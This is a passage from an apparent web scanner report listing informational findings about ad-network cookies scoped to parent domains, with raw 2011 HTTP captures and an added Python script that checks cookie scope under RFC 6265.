GET /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025 HTTP/1.1
Host: c.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSC=TmLJ3w**; CMDD=AAF1owE*; CMIMP=102679&1315097282; CMRUM2=04000000002925993182975414771; CMST=TmLJ305iyskD; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyskAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Location: http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 04 Sep 2011 00:48:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:48:11 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMS=65131&1314825471&95308&1314825468&102679&1315097055;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT
Set-Cookie: CMST=TmLJ305iyssE;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:48:11 GMT
Set-Cookie: CMD1=AAFehU5iyssAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/ck/10105-135615
...[SNIP]...

11.15. http://ce.lijit.com/merge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=1&3pid=2925993182975414771 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n15 ( lax-agg-n48), ms lax-agg-n48 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Mon, 05 Sep 2011 00:58:08 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;
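The finding in 11.14 and 11.15 above, which recurs through the rest of this group, rests on one rule from RFC 6265: a cookie carrying a Domain attribute is stored under that domain (leading dot ignored) and is then sent to, and can be overwritten by, every host that domain-matches it. So `domain=.lijit.com` set by `ce.lijit.com`, or `domain=casalemedia.com` set by `c.casalemedia.com`, is shared with every sibling subdomain, which is why the scanner reports it even where no session token is involved. The following Python is an added example, not part of the XSS.CX report or the scanner's own code: it applies the domain-match check to raw Set-Cookie lines so the finding can be reproduced offline. The `CookieScope` record and the function names are this example's own. The sample header for `ljtrtb` is copied from the ce.lijit.com capture above; the lines for cookies `x` and `y` are constructed to show a host-only cookie and one a browser would reject.

```python
"""Audit Set-Cookie headers for cookies scoped to a parent of the issuing host.

Added example (not from the XSS.CX report). Implements the RFC 6265
domain-match rule; sample data below is copied from captures in this
report plus two constructed lines.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class CookieScope:
    name: str
    domain_attr: Optional[str]   # Domain attribute as sent (None if absent)
    effective_domain: str        # where a browser will actually store/send it
    parent_scoped: bool          # scope is wider than the issuing host
    rejected: bool               # browser discards the cookie entirely
    http_only: bool
    secure: bool


def domain_matches(host: str, domain: str) -> bool:
    """RFC 6265 s5.1.3: host equals domain, or ends with '.' + domain."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def classify_set_cookie(issuing_host: str, set_cookie: str) -> CookieScope:
    """Classify one Set-Cookie line (with or without the header name) as a browser stores it."""
    value = set_cookie
    if value.lower().startswith("set-cookie:"):
        value = value.split(":", 1)[1]
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    domain_attr: Optional[str] = None
    http_only = secure = False
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "domain" and val.strip():
            domain_attr = val.strip()
        elif key == "httponly":
            http_only = True
        elif key == "secure":
            secure = True

    host = issuing_host.lower()
    if domain_attr is None:
        # Host-only cookie: returned only to the exact issuing host.
        return CookieScope(name, None, host, False, False, http_only, secure)

    # RFC 6265 s5.2.3: a leading dot is ignored; comparison is case-insensitive.
    domain = domain_attr.lstrip(".").lower()
    if not domain_matches(host, domain):
        # s5.3 step 6: Domain does not cover the issuing host, cookie is ignored.
        return CookieScope(name, domain_attr, "", False, True, http_only, secure)

    # Accepted. Parent-scoped whenever Domain is a proper suffix of the host:
    # every sibling subdomain and the apex will also receive and may overwrite it.
    return CookieScope(name, domain_attr, domain, domain != host, False, http_only, secure)


def audit_response(issuing_host: str, raw_headers: List[str]) -> List[CookieScope]:
    """Pick the Set-Cookie lines out of a raw header list and classify each one."""
    return [classify_set_cookie(issuing_host, h)
            for h in raw_headers if h.lower().startswith("set-cookie:")]


def parent_scoped_names(issuing_host: str, raw_headers: List[str]) -> List[str]:
    """Names of accepted cookies whose scope is wider than the issuing host."""
    return [c.name for c in audit_response(issuing_host, raw_headers) if c.parent_scoped]


# Sample input: the ljtrtb line is copied from the ce.lijit.com response above;
# cookies x and y are constructed (host-only, and a Domain the browser rejects).
SAMPLE_HOST = "ce.lijit.com"
SAMPLE_HEADERS = [
    "Set-Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com",
    "Set-Cookie: x=1; Path=/",
    "Set-Cookie: y=2; Domain=other.example; Path=/",
]

if __name__ == "__main__":
    for c in audit_response(SAMPLE_HOST, SAMPLE_HEADERS):
        print(c)
```

Run against the other captures in this group the same way: pass the `Host:` value from the request and the response's Set-Cookie lines. The check only tells you whether a cookie leaves the issuing host; whether that matters depends on what the cookie carries and on who else controls hosts under the same parent, which is the review the issue text asks for.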

11.16. http://cm.npc-mcclatchy.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 814


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

11.17. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7261694771272195332; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.18. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.19. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.20. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.21. http://i.casalemedia.com/imp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.casalemedia.com
Path:   /imp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp.gif?c=89733&cr=235451 HTTP/1.1
Host: i.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=102679&1315097055; CMST=TmLJ305iyd8B; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:06 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:53:06 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT

GIF89a.............!.......,...........D..;

11.22. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 00:57:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:20 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120
Date: Sun, 04 Sep 2011 00:57:20 GMT
Content-Length: 0


11.23. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:2925993182975414771 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; PUBRETARGET=78_1409703834

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:31 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:48:03 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


11.24. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097673_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:33 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:33 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 295

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' heigh
...[SNIP]...

11.25. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051; uid=1_1315097284_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cre=1_1315097700_34021:68285:2:0:415_34024:68283:2:649:741_34024:68292:2:119537:119619_34023:68293:1:120250:120250; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: uid=1_1315097700_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: kwd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: scg=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: ppd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: act=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:55:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5492

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

11.26. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:1765ifu1akkc79&bnum=15702 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
